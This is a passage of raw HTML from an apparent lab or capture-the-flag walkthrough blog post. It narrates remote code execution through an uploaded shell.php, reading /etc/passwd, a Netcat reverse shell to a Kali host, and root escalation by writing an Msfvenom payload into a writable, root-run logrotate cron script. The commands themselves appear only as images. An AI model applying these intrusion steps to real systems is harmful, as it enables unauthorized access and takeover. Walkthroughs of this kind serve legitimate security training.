Code Execution&lt;/b&gt;&amp;nbsp;with exploit &lt;b&gt;shell.php&lt;/b&gt;, for instance commands like &lt;b&gt;id&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiAFrukIC7KHfRVbtxDi_ayn9jL3XmgBA9yEmwz9qV09il9x0Y1_UL63ffGB_WAc058rja7MkyvilnmOqjXxuNz7s770D4iMR6BZitm4ZpDJBnDAmQmEkIIuwsNuV4Exx6pxxhI9LJkgntRPeN22uK7xlRu68LGtn8PgSUKsww8rGnhBpOjHXxwFFACAQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;150&quot; data-original-width=&quot;778&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiAFrukIC7KHfRVbtxDi_ayn9jL3XmgBA9yEmwz9qV09il9x0Y1_UL63ffGB_WAc058rja7MkyvilnmOqjXxuNz7s770D4iMR6BZitm4ZpDJBnDAmQmEkIIuwsNuV4Exx6pxxhI9LJkgntRPeN22uK7xlRu68LGtn8PgSUKsww8rGnhBpOjHXxwFFACAQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Also&amp;nbsp;&lt;b&gt;cat /etc/passwd&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTdZs19oxA1HuyxZubF43KoJr7Z3CCafNM9DAG39AdcsvxZJcBpNUbOKTX9-ZdBnq18oyWkUaDZENofCZtfiCGIgKx1411-YxKRuiNiIlxwgupw6nMYQOgvpsRPRTaTH0rMSnSpDrZ5JbtaCLAzN04nUoxm53o_4d3DKSJdzUWMfRCKJm9anIXwloArg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;536&quot; data-original-width=&quot;759&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTdZs19oxA1HuyxZubF43KoJr7Z3CCafNM9DAG39AdcsvxZJcBpNUbOKTX9-ZdBnq18oyWkUaDZENofCZtfiCGIgKx1411-YxKRuiNiIlxwgupw6nMYQOgvpsRPRTaTH0rMSnSpDrZ5JbtaCLAzN04nUoxm53o_4d3DKSJdzUWMfRCKJm9anIXwloArg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now let&#39;s inject a Netcat reverse shell command towards Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgMFuwvpEz3WeyTsgW0qRgehxfBO9guR1jHZODCgnTY1UXwQBjQoL9nSt9jbFxuzRkg5hS_94tEM66GwTtXidDuwlwiZxetMNmKFITSXNETkp6yXHiXtMvmMGZ5kQGq1AiLVbJGD_YftQCjuiP0B9f0ahsjd8GsPtLfgju_0LVvlshy7NaoPQKEthPfwg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;83&quot; data-original-width=&quot;311&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgMFuwvpEz3WeyTsgW0qRgehxfBO9guR1jHZODCgnTY1UXwQBjQoL9nSt9jbFxuzRkg5hS_94tEM66GwTtXidDuwlwiZxetMNmKFITSXNETkp6yXHiXtMvmMGZ5kQGq1AiLVbJGD_YftQCjuiP0B9f0ahsjd8GsPtLfgju_0LVvlshy7NaoPQKEthPfwg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh7mpg7xxPq4m6L0EE9e6pv8zVIi-dJcxvgRqWqRcDKXIS8GCd8CE-3iaG2HT-2AtfprRJUCOFr51_qgwmFVrd1Ni-cwJfYGjVgp9-rH6VKG6maRDGRjQAOnmWyX5oYQozw2Dw_zJiPGmvac18SQWDgU_l7GtncPRvDxcZR4wgxKO-_-1Gekj2iZbYfJQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;78&quot; data-original-width=&quot;604&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh7mpg7xxPq4m6L0EE9e6pv8zVIi-dJcxvgRqWqRcDKXIS8GCd8CE-3iaG2HT-2AtfprRJUCOFr51_qgwmFVrd1Ni-cwJfYGjVgp9-rH6VKG6maRDGRjQAOnmWyX5oYQozw2Dw_zJiPGmvac18SQWDgU_l7GtncPRvDxcZR4wgxKO-_-1Gekj2iZbYfJQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;- It works and we have a shell:&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg1kM1COaWehVZI4jOmtbY4dzoO7bCsUUTjMZ-cAK7R5SZoLDzfW5Yv8Gyw2WOC8XJXg5jm1k6dzKro3oSoUD2ugoErONbEHFLVGN3JC5O8q_97fmaKgigHPhzB4PuSJZnUIBqRyq3MTh28qTgyS_pOVFXYFkRKUsHEt_-m88RptrRJKm4rGQTV_Tg9sg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;145&quot; data-original-width=&quot;683&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg1kM1COaWehVZI4jOmtbY4dzoO7bCsUUTjMZ-cAK7R5SZoLDzfW5Yv8Gyw2WOC8XJXg5jm1k6dzKro3oSoUD2ugoErONbEHFLVGN3JC5O8q_97fmaKgigHPhzB4PuSJZnUIBqRyq3MTh28qTgyS_pOVFXYFkRKUsHEt_-m88RptrRJKm4rGQTV_Tg9sg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjwv9Oz6zgKcu6ptJM_uakzKM2ykf4HoJZLKob1gDq7fTCi9ME4t5Arxwn1_gZJHnBAJY4YaV7QiER0Z1ig7gXQ4JpfVthxi5nwFKRcVzs0kGjkKxyHl70-hI0owNDZ6qrA5iw_PEds46V4vzyU49vwW2o5TiyQ5y4gYkxARx5sHjQnxMJklVULgwFzAw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;526&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjwv9Oz6zgKcu6ptJM_uakzKM2ykf4HoJZLKob1gDq7fTCi9ME4t5Arxwn1_gZJHnBAJY4YaV7QiER0Z1ig7gXQ4JpfVthxi5nwFKRcVzs0kGjkKxyHl70-hI0owNDZ6qrA5iw_PEds46V4vzyU49vwW2o5TiyQ5y4gYkxARx5sHjQnxMJklVULgwFzAw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for &lt;b&gt;cron&lt;/b&gt; jobs we find&lt;b&gt; logrotate&lt;/b&gt;, what is writable and can be run as&lt;b&gt; root:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTBWJ46nX3SWGEprGNCy68zPvnGNhT8VTWjhsidk4LfGVxrfg5BQ0D07rKmVV0hIEYJOKkDhBjwZqgWVv-wH4w8NgDnZOCCfzXX2eXyzlkgaDo3JtJi0ICKQ0TfntQsFwf0sHtrd6RRmuJbWvV7ONpP4sL2zjYYi9kEyvHVrEsh9TJWxogsu8Srwvwjw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;411&quot; data-original-width=&quot;802&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTBWJ46nX3SWGEprGNCy68zPvnGNhT8VTWjhsidk4LfGVxrfg5BQ0D07rKmVV0hIEYJOKkDhBjwZqgWVv-wH4w8NgDnZOCCfzXX2eXyzlkgaDo3JtJi0ICKQ0TfntQsFwf0sHtrd6RRmuJbWvV7ONpP4sL2zjYYi9kEyvHVrEsh9TJWxogsu8Srwvwjw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;logrotate&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilX0az449JVWUFx4B34UH34oqKzTEhINmc6ro7WS2Fmsx9Sxjx2pNz_d9e-MW5EHMYSRmfvztIuO7zpLAwiorVeGT91pBXxHqd0D8GcMI50aiEBdwPsBRDJU_pOolZAJj-y3t2QcpU3qqyCXPFxtzWvEDbBBe4sQKOh-5RhNe-X04ft5TxAZy9DrIi3g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;208&quot; data-original-width=&quot;872&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilX0az449JVWUFx4B34UH34oqKzTEhINmc6ro7WS2Fmsx9Sxjx2pNz_d9e-MW5EHMYSRmfvztIuO7zpLAwiorVeGT91pBXxHqd0D8GcMI50aiEBdwPsBRDJU_pOolZAJj-y3t2QcpU3qqyCXPFxtzWvEDbBBe4sQKOh-5RhNe-X04ft5TxAZy9DrIi3g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Let&#39;s try to edit &lt;b&gt;logrotate&lt;/b&gt; by writing an exploit to it.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- First, creating an exploit with &lt;b&gt;Msfvenom&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhnnJeX0pAQgczSstJr3_zECUqOSd5Q9IESv4_tvHxIaHjjPj3QeVRTa5ZSpEXtGc6udeLWRjZ2IQ9jSDb4UZylCxpxxwD9VAClVTJ_MqkJhEKNGEdoecFYzVO_xAsTBpkMawnL83wP7pwZ9cib13d9NELl24YfigWmqqAdy5T9WFU59VT4PsS8GVsSag&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;164&quot; data-original-width=&quot;1089&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhnnJeX0pAQgczSstJr3_zECUqOSd5Q9IESv4_tvHxIaHjjPj3QeVRTa5ZSpEXtGc6udeLWRjZ2IQ9jSDb4UZylCxpxxwD9VAClVTJ_MqkJhEKNGEdoecFYzVO_xAsTBpkMawnL83wP7pwZ9cib13d9NELl24YfigWmqqAdy5T9WFU59VT4PsS8GVsSag=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a Netcat listener:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgGSZTEbWpmd9YiLSCzqacfsQ3fy9THD-IHAhy14FcCn7vnhJrKjItgWbNZDa119Yrm6nVOjD2OzX6uiLDc8m4ny8_B6gAUx0xBVp9B6vdnkPFGO998AyO0iQiykmSsDkPRndkvyTK3GKW9Jk2VJFRH2zozDrrGVoCe_o4Yx5tcQRyXwJMYKeLbAjgQkg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;86&quot; data-original-width=&quot;317&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgGSZTEbWpmd9YiLSCzqacfsQ3fy9THD-IHAhy14FcCn7vnhJrKjItgWbNZDa119Yrm6nVOjD2OzX6uiLDc8m4ny8_B6gAUx0xBVp9B6vdnkPFGO998AyO0iQiykmSsDkPRndkvyTK3GKW9Jk2VJFRH2zozDrrGVoCe_o4Yx5tcQRyXwJMYKeLbAjgQkg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Rewriting &lt;b&gt;logrotate&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg0EwvFmcC7MAjfx29Pjsr5JkfhHo8BtSIARB6DGjppxbxeUcQYRMX1GAenZlk27KOYyUzBlKbBHDffmLYU8CiLBRuVUCYbWYkBeFiudFcBaPUwr1FASmtE5JSQ_lMkudHyEbdDaOroTmhyHrfgUaU7StL8342mdG054QQo22i8mPRhYN_ET500mnUs1Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;745&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg0EwvFmcC7MAjfx29Pjsr5JkfhHo8BtSIARB6DGjppxbxeUcQYRMX1GAenZlk27KOYyUzBlKbBHDffmLYU8CiLBRuVUCYbWYkBeFiudFcBaPUwr1FASmtE5JSQ_lMkudHyEbdDaOroTmhyHrfgUaU7StL8342mdG054QQo22i8mPRhYN_ET500mnUs1Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgVYIAb4i5-YXi1Vvw3hScnX0IqUSAcYZR04EE5piFU41lMxLEU4j0z2s69BmJey7HJcYjHdnJfJ9XZ4aWgCr_TCtrU06Mizf1v2u7pv_o7R-Y_Lz2VmT0jvNWT5ZLvitUjcgA0wY7mYghuiW-J8V3dt99vBwuJGkgQUevCK5rFv24T47Dikxp_MPEycg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;32&quot; data-original-width=&quot;1216&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgVYIAb4i5-YXi1Vvw3hScnX0IqUSAcYZR04EE5piFU41lMxLEU4j0z2s69BmJey7HJcYjHdnJfJ9XZ4aWgCr_TCtrU06Mizf1v2u7pv_o7R-Y_Lz2VmT0jvNWT5ZLvitUjcgA0wY7mYghuiW-J8V3dt99vBwuJGkgQUevCK5rFv24T47Dikxp_MPEycg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEimlJQRcnxxNNznTHHJJSAtJAQf6_FjT_d1cq0Pnh5tPrjzryG23GPKzRa8kflqg0CltQKmpN0Sxng--GYdLLw-BVeoSY8NhmHMdH7hzkFCgcNOtEKDFvVdAyEfXd9UOeMkLVSwtffBfJ_f40tlaCTkghrcsuzWVi_1kM3mjHv1XmRH2SwFnxqzbUaYJA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;28&quot; data-original-width=&quot;699&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEimlJQRcnxxNNznTHHJJSAtJAQf6_FjT_d1cq0Pnh5tPrjzryG23GPKzRa8kflqg0CltQKmpN0Sxng--GYdLLw-BVeoSY8NhmHMdH7hzkFCgcNOtEKDFvVdAyEfXd9UOeMkLVSwtffBfJ_f40tlaCTkghrcsuzWVi_1kM3mjHv1XmRH2SwFnxqzbUaYJA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgOMozzQ_OWfP8CycpPOlxZKKBgao1JBH-7FcX1LZxiBypb2O0O4QX9fdj1oOp7kt757hha_3gheWxtrMZHi6uh9E03FC0_eQydXdEQoD0DxbmOuIdGGB2hRkcCpae5yjzDyBK3oCO5IGjuvRGrMHIcTP8gT67ORYmxehNLJOGCTp7ZPgHGf_znpMAC7w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;24&quot; data-original-width=&quot;118&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgOMozzQ_OWfP8CycpPOlxZKKBgao1JBH-7FcX1LZxiBypb2O0O4QX9fdj1oOp7kt757hha_3gheWxtrMZHi6uh9E03FC0_eQydXdEQoD0DxbmOuIdGGB2hRkcCpae5yjzDyBK3oCO5IGjuvRGrMHIcTP8gT67ORYmxehNLJOGCTp7ZPgHGf_znpMAC7w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally, after waiting for 2 minutes until &lt;b&gt;logrotate&lt;/b&gt; is run, we get a root 